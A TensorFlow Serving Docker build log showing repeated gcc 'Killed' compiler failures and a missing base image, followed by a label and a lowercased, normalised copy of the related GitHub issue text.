bazel-out/k8-opt/bin/external/highwayhash -iquote external/double_conversion -iquote bazel-out/k8-opt/bin/external/double_conversion -iquote external/snappy -iquote bazel-out/k8-opt/bin/external/snappy -iquote external/curl -iquote bazel-out/k8-opt/bin/external/curl -iquote external/boringssl -iquote bazel-out/k8-opt/bin/external/boringssl -iquote external/jsoncpp_git -iquote bazel-out/k8-opt/bin/external/jsoncpp_git -iquote external/aws -iquote bazel-out/k8-opt/bin/external/aws -iquote external/aws-c-common -iquote bazel-out/k8-opt/bin/external/aws-c-common -iquote external/aws-c-event-stream -iquote bazel-out/k8-opt/bin/external/aws-c-event-stream -iquote external/aws-checksums -iquote bazel-out/k8-opt/bin/external/aws-checksums -isystem external/nsync/public -isystem bazel-out/k8-opt/bin/external/nsync/public -isystem external/eigen_archive -isystem bazel-out/k8-opt/bin/external/eigen_archive -isystem external/gif -isystem bazel-out/k8-opt/bin/external/gif -isystem external/com_google_protobuf/src -isystem bazel-out/k8-opt/bin/external/com_google_protobuf/src -isystem external/zlib -isystem bazel-out/k8-opt/bin/external/zlib -isystem external/farmhash_archive/src -isystem bazel-out/k8-opt/bin/external/farmhash_archive/src -isystem external/double_conversion -isystem bazel-out/k8-opt/bin/external/double_conversion -isystem external/curl/include -isystem bazel-out/k8-opt/bin/external/curl/include -isystem external/boringssl/src/include -isystem bazel-out/k8-opt/bin/external/boringssl/src/include -isystem external/jsoncpp_git/include -isystem bazel-out/k8-opt/bin/external/jsoncpp_git/include -isystem external/aws/aws-cpp-sdk-core/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-core/include -isystem external/aws/aws-cpp-sdk-s3/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-s3/include -isystem external/aws/aws-cpp-sdk-transfer/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-transfer/include -isystem external/aws-c-common/include -isystem bazel-out/k8-opt/bin/external/aws-c-common/include -isystem external/aws-c-event-stream/include -isystem bazel-out/k8-opt/bin/external/aws-c-event-stream/include -isystem external/aws-checksums/include -isystem bazel-out/k8-opt/bin/external/aws-checksums/include -mavx '-std=c++14' '-D_GLIBCXX_USE_CXX11_ABI=0' '-DMLIR_GENERATED_GPU_KERNELS_ENABLED=1' -DEIGEN_AVOID_STL_ARRAY -Iexternal/gemmlowp -Wno-sign-compare '-ftemplate-depth=900' -fno-exceptions -msse3 -DTENSORFLOW_MONOLITHIC_BUILD -pthread -fno-canonical-system-headers -Wno-builtin-macro-redefined '-D__DATE__="redacted"' '-D__TIMESTAMP__="redacted"' '-D__TIME__="redacted"' -c external/org_tensorflow/tensorflow/core/kernels/cwise_op_select.cc -o bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_select.o) #16 4065.1 Execution platform: @local_execution_config_platform//:platform In file included from external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/FixedPoint:46:0, #16 4065.1 from external/org_tensorflow/tensorflow/core/framework/numeric_types.h:24, #16 4065.1 from external/org_tensorflow/tensorflow/core/framework/register_types.h:20, #16 4065.1 from external/org_tensorflow/tensorflow/core/kernels/cwise_op_select.cc:23: #16 4065.1 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:14:41: warning: ignoring attributes on template argument '__m256i {aka __vector(4) long long int}' [-Wignored-attributes] #16 4065.1 typedef eigen_packet_wrapper<__m256i, 10> Packet32q8i; #16 4065.1 ^ #16 4065.1 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:15:41: warning: ignoring attributes on template argument '__m128i {aka __vector(2) long long int}' [-Wignored-attributes] #16 4065.1 typedef eigen_packet_wrapper<__m128i, 11> Packet16q8i; #16 4065.1 ^ #16 4065.1 In file included from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:49:0, #16 4065.1 from external/org_tensorflow/tensorflow/core/kernels/cwise_ops_common.h:29, #16 4065.1 from external/org_tensorflow/tensorflow/core/kernels/cwise_op_select.cc:24: #16 4065.1 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::StartTransaction(const string&, tensorflow::TransactionToken**)': #16 4065.1 external/org_tensorflow/tensorflow/core/platform/env.h:350:46: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 4065.1 TransactionToken** token) { #16 4065.1 ^~~~~ #16 4065.1 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::GetTransactionForPath(const string&, tensorflow::TransactionToken**)': #16 4065.1 external/org_tensorflow/tensorflow/core/platform/env.h:371:51: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 4065.1 TransactionToken** token) { #16 4065.1 ^~~~~ #16 4065.1 gcc: internal compiler error: Killed (program cc1plus) #16 4065.1 Please submit a full bug report, #16 4065.1 with preprocessed source if appropriate. #16 4065.1 See <file:///usr/share/doc/gcc-7/README.Bugs> for instructions. ERROR: /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/org_tensorflow/tensorflow/core/kernels/linalg/BUILD:193:1: Couldn't build file external/org_tensorflow/tensorflow/core/kernels/linalg/_objs/matrix_square_root_op/matrix_square_root_op.o: C++ compilation of rule '@org_tensorflow//tensorflow/core/kernels/linalg:matrix_square_root_op' failed (Exit 4): gcc failed: error executing command #16 4542.9 (cd /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/execroot/tf_serving && \ #16 4542.9 exec env - \ #16 4542.9 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \ #16 4542.9 PWD=/proc/self/cwd \ #16 4542.9 PYTHON_BIN_PATH=/usr/bin/python3 \ #16 4542.9 /usr/bin/gcc -U_FORTIFY_SOURCE -fstack-protector -Wall -Wunused-but-set-parameter -Wno-free-nonheap-object -fno-omit-frame-pointer -g0 -O2 '-D_FORTIFY_SOURCE=1' -DNDEBUG -ffunction-sections -fdata-sections '-std=c++0x' -MD -MF bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/linalg/_objs/matrix_square_root_op/matrix_square_root_op.d '-frandom-seed=bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/linalg/_objs/matrix_square_root_op/matrix_square_root_op.o' -DCURL_STATICLIB -DPLATFORM_LINUX -DENABLE_CURL_CLIENT -DOPENSSL_IS_BORINGSSL -DHAVE_SYS_UIO_H -DTF_USE_SNAPPY -D__CLANG_SUPPORT_DYN_ANNOTATION__ -DEIGEN_MPL2_ONLY '-DEIGEN_MAX_ALIGN_BYTES=64' '-DEIGEN_HAS_TYPE_TRAITS=0' -iquote external/org_tensorflow -iquote bazel-out/k8-opt/bin/external/org_tensorflow -iquote external/com_google_absl -iquote bazel-out/k8-opt/bin/external/com_google_absl -iquote external/nsync -iquote bazel-out/k8-opt/bin/external/nsync -iquote external/eigen_archive -iquote bazel-out/k8-opt/bin/external/eigen_archive -iquote external/gif -iquote bazel-out/k8-opt/bin/external/gif -iquote external/libjpeg_turbo -iquote bazel-out/k8-opt/bin/external/libjpeg_turbo -iquote external/com_google_protobuf -iquote bazel-out/k8-opt/bin/external/com_google_protobuf -iquote external/zlib -iquote bazel-out/k8-opt/bin/external/zlib -iquote external/com_googlesource_code_re2 -iquote bazel-out/k8-opt/bin/external/com_googlesource_code_re2 -iquote external/farmhash_archive -iquote bazel-out/k8-opt/bin/external/farmhash_archive -iquote external/fft2d -iquote bazel-out/k8-opt/bin/external/fft2d -iquote external/highwayhash -iquote bazel-out/k8-opt/bin/external/highwayhash -iquote external/double_conversion -iquote bazel-out/k8-opt/bin/external/double_conversion -iquote external/snappy -iquote bazel-out/k8-opt/bin/external/snappy -iquote external/curl -iquote bazel-out/k8-opt/bin/external/curl -iquote external/boringssl -iquote bazel-out/k8-opt/bin/external/boringssl -iquote external/jsoncpp_git -iquote bazel-out/k8-opt/bin/external/jsoncpp_git -iquote external/aws -iquote bazel-out/k8-opt/bin/external/aws -iquote external/aws-c-common -iquote bazel-out/k8-opt/bin/external/aws-c-common -iquote external/aws-c-event-stream -iquote bazel-out/k8-opt/bin/external/aws-c-event-stream -iquote external/aws-checksums -iquote bazel-out/k8-opt/bin/external/aws-checksums -isystem external/nsync/public -isystem bazel-out/k8-opt/bin/external/nsync/public -isystem external/eigen_archive -isystem bazel-out/k8-opt/bin/external/eigen_archive -isystem external/gif -isystem bazel-out/k8-opt/bin/external/gif -isystem external/com_google_protobuf/src -isystem bazel-out/k8-opt/bin/external/com_google_protobuf/src -isystem external/zlib -isystem bazel-out/k8-opt/bin/external/zlib -isystem external/farmhash_archive/src -isystem bazel-out/k8-opt/bin/external/farmhash_archive/src -isystem external/double_conversion -isystem bazel-out/k8-opt/bin/external/double_conversion -isystem external/curl/include -isystem bazel-out/k8-opt/bin/external/curl/include -isystem external/boringssl/src/include -isystem bazel-out/k8-opt/bin/external/boringssl/src/include -isystem external/jsoncpp_git/include -isystem bazel-out/k8-opt/bin/external/jsoncpp_git/include -isystem external/aws/aws-cpp-sdk-core/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-core/include -isystem external/aws/aws-cpp-sdk-s3/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-s3/include -isystem external/aws/aws-cpp-sdk-transfer/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-transfer/include -isystem external/aws-c-common/include -isystem bazel-out/k8-opt/bin/external/aws-c-common/include -isystem external/aws-c-event-stream/include -isystem bazel-out/k8-opt/bin/external/aws-c-event-stream/include -isystem external/aws-checksums/include -isystem bazel-out/k8-opt/bin/external/aws-checksums/include -mavx '-std=c++14' '-D_GLIBCXX_USE_CXX11_ABI=0' -DEIGEN_AVOID_STL_ARRAY -Iexternal/gemmlowp -Wno-sign-compare '-ftemplate-depth=900' -fno-exceptions -msse3 -DTENSORFLOW_MONOLITHIC_BUILD -pthread -fno-canonical-system-headers -Wno-builtin-macro-redefined '-D__DATE__="redacted"' '-D__TIMESTAMP__="redacted"' '-D__TIME__="redacted"' -c external/org_tensorflow/tensorflow/core/kernels/linalg/matrix_square_root_op.cc -o bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/linalg/_objs/matrix_square_root_op/matrix_square_root_op.o) #16 4542.9 Execution platform: @local_execution_config_platform//:platform In file included from external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/FixedPoint:46:0, #16 4542.9 from external/org_tensorflow/tensorflow/core/framework/types.h:27, #16 4542.9 from external/org_tensorflow/tensorflow/core/framework/kernel_def_builder.h:19, #16 4542.9 from external/org_tensorflow/tensorflow/core/kernels/linalg/matrix_square_root_op.cc:20: #16 4542.9 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:14:41: warning: ignoring attributes on template argument '__m256i {aka __vector(4) long long int}' [-Wignored-attributes] #16 4542.9 typedef eigen_packet_wrapper<__m256i, 10> Packet32q8i; #16 4542.9 ^ #16 4542.9 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:15:41: warning: ignoring attributes on template argument '__m128i {aka __vector(2) long long int}' [-Wignored-attributes] #16 4542.9 typedef eigen_packet_wrapper<__m128i, 11> Packet16q8i; #16 4542.9 ^ #16 4542.9 In file included from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:49:0, #16 4542.9 from external/org_tensorflow/tensorflow/core/kernels/linalg/matrix_square_root_op.cc:21: #16 4542.9 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::StartTransaction(const string&, tensorflow::TransactionToken**)': #16 4542.9 external/org_tensorflow/tensorflow/core/platform/env.h:350:46: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 4542.9 TransactionToken** token) { #16 4542.9 ^~~~~ #16 4542.9 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::GetTransactionForPath(const string&, tensorflow::TransactionToken**)': #16 4542.9 external/org_tensorflow/tensorflow/core/platform/env.h:371:51: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 4542.9 TransactionToken** token) { #16 4542.9 ^~~~~ #16 4542.9 gcc: internal compiler error: Killed (program cc1plus) #16 4542.9 Please submit a full bug report, #16 4542.9 with preprocessed source if appropriate. #16 4542.9 See <file:///usr/share/doc/gcc-7/README.Bugs> for instructions. ERROR: /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/org_tensorflow/tensorflow/core/kernels/BUILD:3991:1: Couldn't build file external/org_tensorflow/tensorflow/core/kernels/_objs/bias_op/bias_op.o: C++ compilation of rule '@org_tensorflow//tensorflow/core/kernels:bias_op' failed (Exit 4): gcc failed: error executing command #16 4887.7 (cd /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/execroot/tf_serving && \ #16 4887.7 exec env - \ #16 4887.7 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \ #16 4887.7 PWD=/proc/self/cwd \ #16 4887.7 PYTHON_BIN_PATH=/usr/bin/python3 \ #16 4887.7 /usr/bin/gcc -U_FORTIFY_SOURCE -fstack-protector -Wall -Wunused-but-set-parameter -Wno-free-nonheap-object -fno-omit-frame-pointer -g0 -O2 '-D_FORTIFY_SOURCE=1' -DNDEBUG -ffunction-sections -fdata-sections '-std=c++0x' -MD -MF bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/bias_op/bias_op.d '-frandom-seed=bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/bias_op/bias_op.o' -DCURL_STATICLIB -DPLATFORM_LINUX -DENABLE_CURL_CLIENT -DOPENSSL_IS_BORINGSSL -DTENSORFLOW_USE_CUSTOM_CONTRACTION_KERNEL -DTENSORFLOW_USE_MKLDNN_CONTRACTION_KERNEL -DHAVE_SYS_UIO_H -DTF_USE_SNAPPY -D__CLANG_SUPPORT_DYN_ANNOTATION__ -DEIGEN_MPL2_ONLY '-DEIGEN_MAX_ALIGN_BYTES=64' '-DEIGEN_HAS_TYPE_TRAITS=0' -iquote external/org_tensorflow -iquote bazel-out/k8-opt/bin/external/org_tensorflow -iquote external/com_google_absl -iquote bazel-out/k8-opt/bin/external/com_google_absl -iquote external/eigen_archive -iquote bazel-out/k8-opt/bin/external/eigen_archive -iquote external/mkl_dnn -iquote bazel-out/k8-opt/bin/external/mkl_dnn -iquote external/nsync -iquote bazel-out/k8-opt/bin/external/nsync -iquote external/gif -iquote bazel-out/k8-opt/bin/external/gif -iquote external/libjpeg_turbo -iquote bazel-out/k8-opt/bin/external/libjpeg_turbo -iquote external/com_google_protobuf -iquote bazel-out/k8-opt/bin/external/com_google_protobuf -iquote external/zlib -iquote bazel-out/k8-opt/bin/external/zlib -iquote external/com_googlesource_code_re2 -iquote bazel-out/k8-opt/bin/external/com_googlesource_code_re2 -iquote external/farmhash_archive -iquote bazel-out/k8-opt/bin/external/farmhash_archive -iquote external/fft2d -iquote bazel-out/k8-opt/bin/external/fft2d -iquote external/highwayhash -iquote bazel-out/k8-opt/bin/external/highwayhash -iquote external/double_conversion -iquote bazel-out/k8-opt/bin/external/double_conversion -iquote external/snappy -iquote bazel-out/k8-opt/bin/external/snappy -iquote external/curl -iquote bazel-out/k8-opt/bin/external/curl -iquote external/boringssl -iquote bazel-out/k8-opt/bin/external/boringssl -iquote external/jsoncpp_git -iquote bazel-out/k8-opt/bin/external/jsoncpp_git -iquote external/aws -iquote bazel-out/k8-opt/bin/external/aws -iquote external/aws-c-common -iquote bazel-out/k8-opt/bin/external/aws-c-common -iquote external/aws-c-event-stream -iquote bazel-out/k8-opt/bin/external/aws-c-event-stream -iquote external/aws-checksums -iquote bazel-out/k8-opt/bin/external/aws-checksums -isystem external/eigen_archive -isystem bazel-out/k8-opt/bin/external/eigen_archive -isystem external/mkl_dnn/include -isystem bazel-out/k8-opt/bin/external/mkl_dnn/include -isystem external/mkl_dnn/src -isystem bazel-out/k8-opt/bin/external/mkl_dnn/src -isystem external/mkl_dnn/src/common -isystem bazel-out/k8-opt/bin/external/mkl_dnn/src/common -isystem external/mkl_dnn/src/cpu -isystem bazel-out/k8-opt/bin/external/mkl_dnn/src/cpu -isystem external/mkl_dnn/src/cpu/gemm -isystem bazel-out/k8-opt/bin/external/mkl_dnn/src/cpu/gemm -isystem external/mkl_dnn/src/cpu/xbyak -isystem bazel-out/k8-opt/bin/external/mkl_dnn/src/cpu/xbyak -isystem external/nsync/public -isystem bazel-out/k8-opt/bin/external/nsync/public -isystem external/gif -isystem bazel-out/k8-opt/bin/external/gif -isystem external/com_google_protobuf/src -isystem bazel-out/k8-opt/bin/external/com_google_protobuf/src -isystem external/zlib -isystem bazel-out/k8-opt/bin/external/zlib -isystem external/farmhash_archive/src -isystem bazel-out/k8-opt/bin/external/farmhash_archive/src -isystem external/double_conversion -isystem bazel-out/k8-opt/bin/external/double_conversion -isystem external/curl/include -isystem bazel-out/k8-opt/bin/external/curl/include -isystem external/boringssl/src/include -isystem bazel-out/k8-opt/bin/external/boringssl/src/include -isystem external/jsoncpp_git/include -isystem bazel-out/k8-opt/bin/external/jsoncpp_git/include -isystem external/aws/aws-cpp-sdk-core/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-core/include -isystem external/aws/aws-cpp-sdk-s3/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-s3/include -isystem external/aws/aws-cpp-sdk-transfer/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-transfer/include -isystem external/aws-c-common/include -isystem bazel-out/k8-opt/bin/external/aws-c-common/include -isystem external/aws-c-event-stream/include -isystem bazel-out/k8-opt/bin/external/aws-c-event-stream/include -isystem external/aws-checksums/include -isystem bazel-out/k8-opt/bin/external/aws-checksums/include -mavx '-std=c++14' '-D_GLIBCXX_USE_CXX11_ABI=0' -DEIGEN_AVOID_STL_ARRAY -Iexternal/gemmlowp -Wno-sign-compare '-ftemplate-depth=900' -fno-exceptions -msse3 -DTENSORFLOW_MONOLITHIC_BUILD -pthread -fno-canonical-system-headers -Wno-builtin-macro-redefined '-D__DATE__="redacted"' '-D__TIMESTAMP__="redacted"' '-D__TIME__="redacted"' -c external/org_tensorflow/tensorflow/core/kernels/bias_op.cc -o bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/bias_op/bias_op.o) #16 4887.7 Execution platform: @local_execution_config_platform//:platform In file included from external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/FixedPoint:46:0, #16 4887.7 from external/org_tensorflow/tensorflow/core/framework/types.h:27, #16 4887.7 from external/org_tensorflow/tensorflow/core/framework/numeric_op_base.h:20, #16 4887.7 from external/org_tensorflow/tensorflow/core/framework/numeric_op.h:18, #16 4887.7 from external/org_tensorflow/tensorflow/core/kernels/bias_op.cc:23: #16 4887.7 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:14:41: warning: ignoring attributes on template argument '__m256i {aka __vector(4) long long int}' [-Wignored-attributes] #16 4887.7 typedef eigen_packet_wrapper<__m256i, 10> Packet32q8i; #16 4887.7 ^ #16 4887.7 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:15:41: warning: ignoring attributes on template argument '__m128i {aka __vector(2) long long int}' [-Wignored-attributes] #16 4887.7 typedef eigen_packet_wrapper<__m128i, 11> Packet16q8i; #16 4887.7 ^ #16 4887.7 In file included from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:49:0, #16 4887.7 from external/org_tensorflow/tensorflow/core/framework/numeric_op.h:19, #16 4887.7 from external/org_tensorflow/tensorflow/core/kernels/bias_op.cc:23: #16 4887.7 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::StartTransaction(const string&, tensorflow::TransactionToken**)': #16 4887.7 external/org_tensorflow/tensorflow/core/platform/env.h:350:46: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 4887.7 TransactionToken** token) { #16 4887.7 ^~~~~ #16 4887.7 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::GetTransactionForPath(const string&, tensorflow::TransactionToken**)': #16 4887.7 external/org_tensorflow/tensorflow/core/platform/env.h:371:51: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 4887.7 TransactionToken** token) { #16 4887.7 ^~~~~ #16 4887.7 gcc: internal compiler error: Killed (program cc1plus) #16 4887.7 Please submit a full bug report, #16 4887.7 with preprocessed source if appropriate. #16 4887.7 See <file:///usr/share/doc/gcc-7/README.Bugs> for instructions. Target //tensorflow_serving/model_servers:tensorflow_model_server failed to build INFO: Elapsed time: 9471.143s, Critical Path: 280.07s INFO: 6629 processes: 6629 local. FAILED: Build did NOT complete successfully #16 9472.1 ------37.8 Dockerfile.devel:104 -------------------- 103 | 104 | >>> RUN bazel build --color=yes --curses=yes \ 105 | >>> ${TF_SERVING_BAZEL_OPTIONS} \ 106 | >>> --verbose_failures \ 107 | >>> --output_filter=DONT_MATCH_ANYTHING \ 108 | >>> ${TF_SERVING_BUILD_OPTIONS} \ 109 | >>> tensorflow_serving/model_servers:tensorflow_model_server && \ 110 | >>> cp bazel-bin/tensorflow_serving/model_servers/tensorflow_model_server \ 111 | >>> /usr/local/bin/ 112 | -------------------- error: failed to solve: rpc error: code = Unknown desc = executor failed running [/bin/sh -c bazel build --color=yes --curses=yes ${TF_SERVING_BAZEL_OPTIONS} --verbose_failures --output_filter=DONT_MATCH_ANYTHING ${TF_SERVING_BUILD_OPTIONS} tensorflow_serving/model_servers:tensorflow_model_server && cp bazel-bin/tensorflow_serving/model_servers/tensorflow_model_server /usr/local/bin/]: exit code: 1 WARN[0000] No output specified for docker-container driver. Build result will only remain in the build cache. To push result image into registry use --push or to load image into docker use --load #1 [internal] load build definition from Dockerfile #1 sha256:7b7f2648c1157fec740c05f9d315bb91e3ddb0acba9635f04ba97c2487952ea6 #1 transferring dockerfile: 2.06kB 0.0s done #1 DONE 0.1s #2 [internal] load .dockerignore #2 sha256:f7e85ba477cfcd7e3ca106d82fad92f828c0c7eecdb7b4d8e66fac5ea2b9b053 #2 transferring context: 2B 0.0s done #2 DONE 0.0s #4 [internal] load metadata for docker.io/library/ubuntu:18.04 #4 sha256:ae46bbb1b755529d0da663ca0256a22acd7c9fe21844946c149800baa67c4e4b #4 ... #5 [auth] library/ubuntu:pull token for registry-1.docker.io #5 sha256:dc2259b96c63cdf9ac92987eaeb8defb94d706e86e9f543ee2e945a669e202da #5 DONE 0.0s #3 [internal] load metadata for docker.io/rogeryuchao/tensorflow-serving-devel:1.0.0 #3 sha256:a4ac02309c14eaa78eef558007485c97914b03ee24d1af3338c524cec6d83f7a #3 ... #6 [auth] rogeryuchao/tensorflow-serving-devel:pull token for registry-1.docker.io #6 sha256:86c38852e2b6b06b3a09d737b0aadfc525290359e8167825852db99c65646684 #6 DONE 0.0s #3 [internal] load metadata for docker.io/rogeryuchao/tensorflow-serving-devel:1.0.0 #3 sha256:a4ac02309c14eaa78eef558007485c97914b03ee24d1af3338c524cec6d83f7a #3 ... #4 [internal] load metadata for docker.io/library/ubuntu:18.04 #4 sha256:ae46bbb1b755529d0da663ca0256a22acd7c9fe21844946c149800baa67c4e4b #4 DONE 2.7s #3 [internal] load metadata for docker.io/rogeryuchao/tensorflow-serving-devel:1.0.0 #3 sha256:a4ac02309c14eaa78eef558007485c97914b03ee24d1af3338c524cec6d83f7a #3 ERROR: docker.io/rogeryuchao/tensorflow-serving-devel:1.0.0: not found ------ > [internal] load metadata for docker.io/rogeryuchao/tensorflow-serving-devel:1.0.0: ------ error: failed to solve: rpc error: code = Unknown desc = failed to solve with frontend dockerfile.v0: failed to create LLB definition: docker.io/rogeryuchao/tensorflow-serving-devel:1.0.0: not found ```
non_priority
tfx cpu optimization compiling in docker multiple compile steps failure bug report system information os platform and distribution e g linux ubuntu mac os bigsir tensorflow serving installed from source or binary source tensorflow serving version describe the problem i need to compile an cpu optimized version for tensorflow serving operations is based on the document page and i fail to bazel build the docker tfx in the docker for times which are consistently have the same problem also the total compiling time is longer than it is normal exact steps to reproduce here is the shell file to do run the building: tfx cpu compile sh bin bash user tag tf serving version git branch git clone branch tf serving version git branch tf serving build options copt mavx local ram resources cd serving docker buildx build pull t user tensorflow serving devel tag build arg tf serving version git branch tf serving version git branch build arg tf serving build options tf serving build options f tensorflow serving tools docker dockerfile devel here is the command for running the shell file tfx cpu compile sh rogeryuchao source code logs there are bunch of error message and i m not quite sure which one is the contributor to this failure building warn no output specified for docker container driver build result will only remain in the build cache to push result image into registry use push or to load image into docker use load building load build definition from dockerfile devel transferring dockerfile load dockerignore transferring context load metadata for docker io library ubuntu library ubuntu pull token for registry docker io from docker io library ubuntu resolve docker io library ubuntu cached run apt get update apt get install y no install recommends automake build essential ca cached run curl fssl o get pip py rm get pip py cached run add apt repository ppa deadsnakes ppa apt get update apt get install y dev py cached run update alternatives install usr bin python python usr bin cached run no cache dir install future grpcio keras applications keras prepr cached run mkdir bazel cd bazel curl h user agent mozilla linux applewebkit kh cached workdir tensorflow serving cached run git clone branch git remote add upstream cached run echo building with build options copt mavx local ram resources cached run echo building with bazel options error run bazel build color yes curses yes verbose failures output filter dont match anything run bazel build color yes curses yes verbose failures output filter dont match anything copt mavx local ram resources tensorflow serving model servers tensorflow model server cp bazel bin tensorflow serving model servers tensorflow model server usr local bin extracting bazel installation starting local bazel server and connecting to it warning download from failed class com google devtools build lib bazel repository downloader unrecoverablehttpexception get returned not found debug rule io bazel rules docker indicated that a canonical reproducible form can be obtained by modifying arguments shallow since debug call stack for the definition of repository io bazel rules docker which is a git repository rule definition at root cache bazel bazel root external bazel tools tools build defs repo git bzl root cache bazel bazel root external bazel toolchains repositories repositories bzl tensorflow serving workspace warning download from failed class com google devtools build lib bazel repository downloader unrecoverablehttpexception get returned not found warning download from failed class com google devtools build lib bazel repository downloader unrecoverablehttpexception get returned not found info analyzed target tensorflow serving model servers tensorflow model server packages loaded targets configured info found target error root cache bazel bazel root external org tensorflow tensorflow compiler mlir tensorflow build couldn t build file external org tensorflow tensorflow compiler mlir tensorflow objs tensorflow ops n z tf ops n z o c compilation of rule org tensorflow tensorflow compiler mlir tensorflow tensorflow ops n z failed exit gcc failed error executing command cd root cache bazel bazel root execroot tf serving exec env path usr local sbin usr local bin usr sbin usr bin sbin bin pwd proc self cwd python bin path usr bin usr bin gcc u fortify source fstack protector wall wunused but set parameter wno free nonheap object fno omit frame pointer d fortify source dndebug ffunction sections fdata sections std c md mf bazel out opt bin external org tensorflow tensorflow compiler mlir tensorflow objs tensorflow ops n z tf ops n z d frandom seed bazel out opt bin external org tensorflow tensorflow compiler mlir tensorflow objs tensorflow ops n z tf ops n z o dllvm enable stats d stdc limit macros d stdc constant macros d stdc format macros dllvm build global isel dtf use snappy deigen only deigen max align bytes deigen has type traits dhave sys uio h d clang support dyn annotation iquote external org tensorflow iquote bazel out opt bin external org tensorflow iquote external llvm project iquote bazel out opt bin external llvm project iquote external zlib iquote bazel out opt bin external zlib iquote external com google absl iquote bazel out opt bin external com google absl iquote external nsync iquote bazel out opt bin external nsync iquote external eigen archive iquote bazel out opt bin external eigen archive iquote external gif iquote bazel out opt bin external gif iquote external libjpeg turbo iquote bazel out opt bin external libjpeg turbo iquote external com google protobuf iquote bazel out opt bin external com google protobuf iquote external com googlesource code iquote bazel out opt bin external com googlesource code iquote external farmhash archive iquote bazel out opt bin external farmhash archive iquote external iquote bazel out opt bin external iquote external highwayhash iquote bazel out opt bin external highwayhash iquote external double conversion iquote bazel out opt bin external double conversion iquote external snappy iquote bazel out opt bin external snappy ibazel out opt bin external llvm project mlir virtual includes callopinterfacesincgen ibazel out opt bin external llvm project mlir virtual includes infertypeopinterfaceincgen ibazel out opt bin external llvm project mlir virtual includes opasminterfaceincgen ibazel out opt bin external llvm project mlir virtual includes regionkindinterfaceincgen ibazel out opt bin external llvm project mlir virtual includes sideeffectinterfacesincgen ibazel out opt bin external llvm project mlir virtual includes symbolinterfacesincgen ibazel out opt bin external llvm project mlir virtual includes derivedattributeopinterfaceincgen ibazel out opt bin external llvm project mlir virtual includes looplikeinterfaceincgen ibazel out opt bin external llvm project mlir virtual includes parsertokenkinds ibazel out opt bin external llvm project mlir virtual includes controlflowinterfacesincgen ibazel out opt bin external llvm project mlir virtual includes standardopsincgen ibazel out opt bin external llvm project mlir virtual includes vectorinterfacesincgen ibazel out opt bin external llvm project mlir virtual includes viewlikeinterfaceincgen isystem external llvm project mlir include isystem bazel out opt bin external llvm project mlir include isystem external llvm project llvm include isystem bazel out opt bin external llvm project llvm include isystem external zlib isystem bazel out opt bin external zlib isystem external nsync public isystem bazel out opt bin external nsync public isystem external eigen archive isystem bazel out opt bin external eigen archive isystem external gif isystem bazel out opt bin external gif isystem external com google protobuf src isystem bazel out opt bin external com google protobuf src isystem external farmhash archive src isystem bazel out opt bin external farmhash archive src isystem external double conversion isystem bazel out opt bin external double conversion mavx std c d glibcxx use abi fno canonical system headers wno builtin macro redefined d date redacted d timestamp redacted d time redacted c external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc o bazel out opt bin external org tensorflow tensorflow compiler mlir tensorflow objs tensorflow ops n z tf ops n z o execution platform local execution config platform platform in file included from external org tensorflow third party unsupported eigen fixedpoint from external org tensorflow tensorflow core framework numeric types h from external org tensorflow tensorflow core framework allocator h from external org tensorflow 